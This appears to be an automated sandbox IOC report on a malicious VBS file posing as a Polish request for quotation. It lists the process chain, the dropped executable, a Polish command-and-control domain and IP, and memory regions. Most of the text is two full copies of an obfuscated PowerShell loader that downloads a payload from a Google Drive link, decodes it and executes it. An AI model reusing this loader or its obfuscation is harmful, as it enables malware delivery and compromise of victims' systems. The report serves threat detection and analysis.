IOC Report
Zapytanie ofertowe (GASTRON 07022024).vbs

Zapytanie ofertowe (GASTRON 07022024).vbs

ASCII text, with CRLF line terminators

initial sample

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist (Stemmetllerens ',o$.eb.oaBld ,eboh,vt ttUneLar,tn eRos ,.b,HAqe aaspdRee,xr,hsPl[.o$TyF.ooSurCegTreN,l zsAneParA ] N=.o$NeB BaLunImjCaeExrWin Oe Cs,i ');$Kviksands=Stemmetllerens ' ,$ bi.aP.dMieB,h.rtC tUretrrL.npaeSus M. aD o.ew n,elDeoBra BdCaFBaiV,l,le.n(Ei$PiSB pSvy tFjs al,oi OkOxkA.e.rrCoe,anAf, l$ ,S Pt TosofPesOkkLeiLofE.ti ePusInyFogBad SoKomudm,ee Cs A) G ';$Stofskiftesygdommes=$Udskriftssidernes[0];Pharmacist (Stemmetllerens 'Te$SugSllLaoSkb,oa .l.i:O.P .uVee ObL.l SoFaa .n,o1Un8Ti=M.(TiTSue AsKat M- ,PSkaHitGrhex $F,SBltTioS,f.es Tk BiPlfExt FeKnsT yTegSkd BoJamL.mLueA sri)Re ');while (!$Puebloan18) {Pharmacist (Stemmetllerens 'Si$N,g.el ,o,vbGraMil,e:,hML aOvt.nrSyiN,mReo vnDgis,iSh=Sk$NetEnr Tur.e n ') ;Pharmacist $Kviksands;Pharmacist (Stemmetllerens 'F,SN.t .a ,r StSa-AbS GlPeeA eT,p T M4 r ');Pharmacist (Stemmetllerens ' .$.fgPhlpho AbS.aC l.e: PPKiufoeVibDal FoJea,enSa1,n8Ti=vu( TTSue.osWhtRa-B P,raHytSph l ra$CuSFitAnoRef .sD,kl.iflfThtWheOdsUny.agtad Jo PmKdm .e NsTr)du ') ;Pharmacist (Stemmetllerens 'Ad$ Fg GlStoLebCoaW l n: eISknElcUno jrR.rUnov dSpaSkbDel ce 2Ka4 K8ov=Fr$D.gR.l,koFob AaOvlH,: SN.kKaa ,mRes .tMetDit RePrrMasMe+ ,+ a%Hu$ CP.ro Brg sPee.esFin oaB pBosSt.F cEno,auTunTitTh ') ;$Spytslikkeren=$Porsesnaps[$Incorrodable248];}$Amebae=318617;$Klokker=25915;Pharmacist (Stemmetllerens 'Br$B,gShl ,oFobTiaRel H:H,NKeyacnPea zVaiR,s kt SegunA,sje Ae=S PsG Se utRe-f.CU.oMan DtOle Sn otC Du$ SPrtPioSof ,s.ok i,kf ,t e Ts Ays gB dAro m,nmIke .sdo ');Pharmacist (Stemmetllerens 'ba$SdgR.lRioU.b.ia.ol F:KiMTayCoxSuoEnm Dy CcV.eFlt SeSn V,= m d.[,oS .y sVatIneSumD .YoCTvoPrn evblecarIntDu]Ul:,i: BF,ir o omPaB Fa,vs feC.6 B4 .SSkt orM iJ.nPrgBr( I$CuNHyy LnSoaKazSaiH.s .tSyeMonAlsP,) i ');Pharmacist (Stemmetllerens '.u$Hug,ul co obskaWolAn:T U .nsaoVabNeu TmUnb.urS a Bt Le.udSk Ti=Sa K[PhSC yPrs ut ,eBom ..SiTR eF,xGotGl.J,EP,nGycAmoSpdUfi .nSugP.] D:M :H,AVaSv CDoIg,ISb. BG,keLvtMaSS,tInrbeiStnDegBi(Gk$B.Mi,yS,xInoMim Iy ac,ae tL.e V)Wy ');Pharmacist (Stemmetllerens 'Ov$.agOvl Bo.obT,a blBa:KaVSvi.vl.udBjt,ajPraIngDotDiecarTinSleFos,r=Th$SmU ,n.uo,abHouBrmGlbOrr ,aTat .eCod O. .s tu abKysTutrer .iSkn ,g V( $ DAF mOmeOmbT,aZoe ,,Fr$StKDil vo okRekFrebar,o)Ep ');Pharmacist $Vildtjagternes;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist (Stemmetllerens ',o$.eb.oaBld ,eboh,vt ttUneLar,tn eRos ,.b,HAqe aaspdRee,xr,hsPl[.o$TyF.ooSurCegTreN,l zsAneParA ] N=.o$NeB BaLunImjCaeExrWin Oe Cs,i ');$Kviksands=Stemmetllerens ' ,$ bi.aP.dMieB,h.rtC tUretrrL.npaeSus M. aD o.ew n,elDeoBra BdCaFBaiV,l,le.n(Ei$PiSB pSvy tFjs al,oi OkOxkA.e.rrCoe,anAf, l$ ,S Pt TosofPesOkkLeiLofE.ti ePusInyFogBad SoKomudm,ee Cs A) G ';$Stofskiftesygdommes=$Udskriftssidernes[0];Pharmacist (Stemmetllerens 'Te$SugSllLaoSkb,oa .l.i:O.P .uVee ObL.l SoFaa .n,o1Un8Ti=M.(TiTSue AsKat M- ,PSkaHitGrhex $F,SBltTioS,f.es Tk BiPlfExt FeKnsT yTegSkd BoJamL.mLueA sri)Re ');while (!$Puebloan18) {Pharmacist (Stemmetllerens 'Si$N,g.el ,o,vbGraMil,e:,hML aOvt.nrSyiN,mReo vnDgis,iSh=Sk$NetEnr Tur.e n ') ;Pharmacist $Kviksands;Pharmacist (Stemmetllerens 'F,SN.t .a ,r StSa-AbS GlPeeA eT,p T M4 r ');Pharmacist (Stemmetllerens ' .$.fgPhlpho AbS.aC l.e: PPKiufoeVibDal FoJea,enSa1,n8Ti=vu( TTSue.osWhtRa-B P,raHytSph l ra$CuSFitAnoRef .sD,kl.iflfThtWheOdsUny.agtad Jo PmKdm .e NsTr)du ') ;Pharmacist (Stemmetllerens 'Ad$ Fg GlStoLebCoaW l n: eISknElcUno jrR.rUnov dSpaSkbDel ce 2Ka4 K8ov=Fr$D.gR.l,koFob AaOvlH,: SN.kKaa ,mRes .tMetDit RePrrMasMe+ ,+ a%Hu$ CP.ro Brg sPee.esFin oaB pBosSt.F cEno,auTunTitTh ') ;$Spytslikkeren=$Porsesnaps[$Incorrodable248];}$Amebae=318617;$Klokker=25915;Pharmacist (Stemmetllerens 'Br$B,gShl ,oFobTiaRel H:H,NKeyacnPea zVaiR,s kt SegunA,sje Ae=S PsG Se utRe-f.CU.oMan DtOle Sn otC Du$ SPrtPioSof ,s.ok i,kf ,t e Ts Ays gB dAro m,nmIke .sdo ');Pharmacist (Stemmetllerens 'ba$SdgR.lRioU.b.ia.ol F:KiMTayCoxSuoEnm Dy CcV.eFlt SeSn V,= m d.[,oS .y sVatIneSumD .YoCTvoPrn evblecarIntDu]Ul:,i: BF,ir o omPaB Fa,vs feC.6 B4 .SSkt orM iJ.nPrgBr( I$CuNHyy LnSoaKazSaiH.s .tSyeMonAlsP,) i ');Pharmacist (Stemmetllerens '.u$Hug,ul co obskaWolAn:T U .nsaoVabNeu TmUnb.urS a Bt Le.udSk Ti=Sa K[PhSC yPrs ut ,eBom ..SiTR eF,xGotGl.J,EP,nGycAmoSpdUfi .nSugP.] D:M :H,AVaSv CDoIg,ISb. BG,keLvtMaSS,tInrbeiStnDegBi(Gk$B.Mi,yS,xInoMim Iy ac,ae tL.e V)Wy ');Pharmacist (Stemmetllerens 'Ov$.agOvl Bo.obT,a blBa:KaVSvi.vl.udBjt,ajPraIngDotDiecarTinSleFos,r=Th$SmU ,n.uo,abHouBrmGlbOrr ,aTat .eCod O. .s tu abKysTutrer .iSkn ,g V( $ DAF mOmeOmbT,aZoe ,,Fr$StKDil vo okRekFrebar,o)Ep ');Pharmacist $Vildtjagternes;"

C:\Program Files (x86)\Windows Mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe

"C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe"

C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe

"C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe"

fiszebrandt.pl

195.128.154.10

mail.fiszebrandt.pl

unknown

195.128.154.10

fiszebrandt.pl

Poland

2303A000

trusted library allocation

page read and write

56CA000

trusted library allocation

page read and write

16B68565000

trusted library allocation

page read and write

8200000

direct allocation

page execute and read and write

2300F000

trusted library allocation

page read and write

22FC1000

trusted library allocation

page read and write

96F5000

direct allocation

page execute and read and write